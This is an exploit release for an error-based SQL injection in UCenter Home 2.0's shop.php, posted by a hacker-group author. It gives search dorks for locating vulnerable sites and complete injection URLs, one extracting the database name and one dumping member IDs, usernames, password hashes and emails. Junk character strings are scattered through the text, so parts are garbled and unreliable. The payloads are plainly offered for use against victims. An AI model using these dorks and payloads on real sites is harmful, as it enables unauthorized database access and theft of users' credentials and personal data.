" ~$ R6 ^2 N5 W+ b- w__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
6 n* D7 v- y8 G# C. g9 U
* Y' k# _% k3 e* Y0 L; ]/ _
9 ~% b, }2 u% T# u' C! o
$ P' a3 F% s# q+ t5 N" ?*/ Author : KnocKout 7 v; F& K( a, P9 v
P6 N' G% Y- x3 h* Y
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
. U4 Y3 G* i8 @5 G/ E9 E
% B8 E( y* h" m3 n: [*/ Contact: knockoutr@msn.com : ~, d% d6 |% L. @" S; q+ S0 s
9 r: p/ @! k/ \+ |: C' q$ b, y
*/ Cyber-Warrior.org/CWKnocKout
" F, e' d ~8 V5 B2 x7 K" p3 s, O; F7 b" R7 K7 }5 F1 o: k& B/ p- }" ?8 {
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== $ _) e. c) v( N
& i* m) k) q |) V- O
Script : UCenter Home 7 ^# h$ N) M+ g8 f! v
/ D# E! F1 [5 w6 q5 V* R0 L7 HVersion : 2.0 ' J4 W1 j* P3 O: Q& X
4 M5 y P x; x1 EScript HomePage : http://u.discuz.net/
3 j. H, j* Y+ r
: k% \5 y& N8 U1 q' G, @__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
- ` D# A& U/ A7 y! }4 o9 z$ m* N) t9 |7 `2 z8 R6 q, [& @5 Y
Dork : Powered by UCenter inurl:shop.php?ac=view
/ X2 ]5 m' c8 p! X4 x' m% l8 J9 P4 z4 w; }6 p
Dork 2 : inurl:shop.php?ac=view&shopid=
0 y, r/ s. ]5 N- v9 J h# |3 W( h) f7 _' a7 q
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
/ B5 _, L. A! ]8 m- H: L6 y$ O7 ^) y! b) w5 }
Vuln file : Shop.php
5 H3 w2 y& O @2 T' l( e
+ ?* e: ~- x' M% ^2 Zvalue's : (?)ac=view&shopid= / L& D" s2 g6 X" O
- |5 K+ p9 F5 c) G: ?
Vulnerable Style : SQL Injection (MySQL Error Based) : }" t5 Z6 p( P; o7 b B9 p
O) D5 G1 Y2 E8 M R" h
Need Metarials : Hex Conversion
1 G; p- E# f% \/ M% T0 ?* j, w' P' p/ O# c3 P
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
! A" x/ ?! d& {3 U
( H( i. P/ I1 W7 G6 x8 uYour Need victim Database name. 5 v/ d1 j: ~3 ?% x$ o5 A* I
( {& J6 A( R& z2 Y* H% J
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 + l% X% P5 d2 z0 e! x) | Q2 K
+ g2 [: }, y4 e M! |7 b+ x+ w( A
..
) T6 h( d# n$ y/ L, ~: v7 D9 E2 P# I* T' w& R# b
DB : Okey. 6 T/ A' H1 d) Y0 L0 r3 \
' m7 d- [7 T& h4 l1 \your edit DB `[TARGET DB NAME]`
( \4 V( s0 ~% `0 G! }! `. a5 o3 Q" Q* l
Example : 'hiwir1_ucenter'
: T3 y; [2 g8 a" u9 q
9 s7 X m6 I3 W8 SEdit : Okey. " q7 Y1 d4 r: b+ n& g k W7 B
/ L2 Y* }5 u( G, `Your use Hex conversion. And edit Your SQL Injection Exploit..
/ d' q- G! k: b! L0 L
! [ p. m+ [& m* A$ x* T
- v: z0 N2 B0 P4 ~! _) A# p/ V4 g. I5 L, H
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 0 u# N( z. p9 Y: A2 m2 S
|